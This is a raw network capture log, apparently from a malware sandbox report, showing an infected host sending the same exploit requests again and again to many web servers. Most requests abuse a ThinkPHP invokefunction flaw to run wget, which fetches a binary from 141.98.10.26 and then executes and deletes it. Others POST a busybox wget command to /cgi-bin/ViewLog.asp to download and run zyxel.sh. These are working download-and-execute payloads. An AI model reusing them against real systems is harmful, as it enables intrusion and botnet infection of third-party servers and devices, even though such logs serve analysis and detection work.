Nov 22, 2023 08:39:09.713207960 CET	9754	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:09.906162977 CET	9762	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:09 GMT Date: Wed, 22 Nov 2023 07:39:09 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 34 39 26 23 34 36 3b 61 32 61 61 34 38 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6f0b1502.1700638749.a2aa48a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
503	192.168.2.23	48138	95.216.154.131	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.715102911 CET	9754	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:09.909907103 CET	9763	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:09 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
504	192.168.2.23	48742	95.10.80.250	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.756979942 CET	9755	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
505	192.168.2.23	39400	31.200.109.239	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.779834986 CET	9757	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
506	192.168.2.23	58406	88.221.177.31	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.872132063 CET	9759	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:10.043190956 CET	9766	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:09 GMT Date: Wed, 22 Nov 2023 07:39:09 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 63 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 34 39 26 23 34 36 3b 34 65 31 37 35 66 63 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.dc3e1202.1700638749.4e175fc0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
507	192.168.2.23	54074	88.65.133.205	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.897419930 CET	9761	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:10.089201927 CET	9768	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
508	192.168.2.23	44682	88.99.2.44	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:09.902000904 CET	9761	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:10.090929985 CET	9769	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:09 GMT Server: Apache Content-Length: 283 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 66 61 75 6c 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at default Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
509	192.168.2.23	43350	112.137.39.70	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.368004084 CET	10037	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:12.645740032 CET	10043	IN	HTTP/1.0 400 Bad Request Date: Mon, 31 Dec 2012 23:46:22 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=EUC-JP Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 2f 34 30 30 2e 68 74 6d 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="refresh" content="0;URL=/400.htm"></head><body>... Padding so that MSIE deigns to show this error instead of its own canned one. Padding so that MSIE deigns to show this error instead of its own canned one. Padding so that MSIE deigns to show this error instead of its own canned one. Padding so that MSIE deigns to show this error instead of its own canned one. Padding so that MSIE deigns to show this error instead of its own canned one. Padding so that MSIE deigns to show this error instead of its own canned one. Padding so that MSIE deigns to show this error instead of its own canned one. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
510	192.168.2.23	46694	112.161.34.131	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.394615889 CET	10038	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:12.691349030 CET	10046	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 22 Nov 2023 07:39:12 GMT Server: lighttpd/1.4.55
Nov 22, 2023 08:39:12.691360950 CET	10046	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

Session ID	Source IP	Source Port	Destination IP	Destination Port
511	192.168.2.23	52030	112.16.224.120	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.500240088 CET	10040	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:12.901035070 CET	10109	IN	HTTP/1.1 400 Bad Request Server: WAF Date: Wed, 22 Nov 2023 07:39:11 GMT Content-Type: text/html Content-Length: 164 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 41 46 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>WAF</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
512	192.168.2.23	36736	112.126.129.47	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.817684889 CET	10108	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:13.131335020 CET	10121	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:12 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
513	192.168.2.23	38914	95.101.249.124	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.833749056 CET	10108	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:13.016084909 CET	10117	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:12 GMT Date: Wed, 22 Nov 2023 07:39:12 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 35 32 26 23 34 36 3b 31 61 37 36 31 63 35 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a4b0f748.1700638752.1a761c5a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
514	192.168.2.23	57416	112.213.95.153	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.928632021 CET	10111	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:13.338500023 CET	10218	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:12 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
515	192.168.2.23	41884	94.74.72.53	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.956708908 CET	10112	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:13.107599020 CET	10121	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 682 Date: Wed, 22 Nov 2023 07:39:13 GMT Keep-Alive: timeout=20 Connection: keep-alive Server: Ordenaris B2B Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 39 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.90</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
516	192.168.2.23	60256	94.110.78.114	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.992027998 CET	10114	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
517	192.168.2.23	48304	31.136.168.22	8080

Timestamp	kBytes transferred	Direction	Data
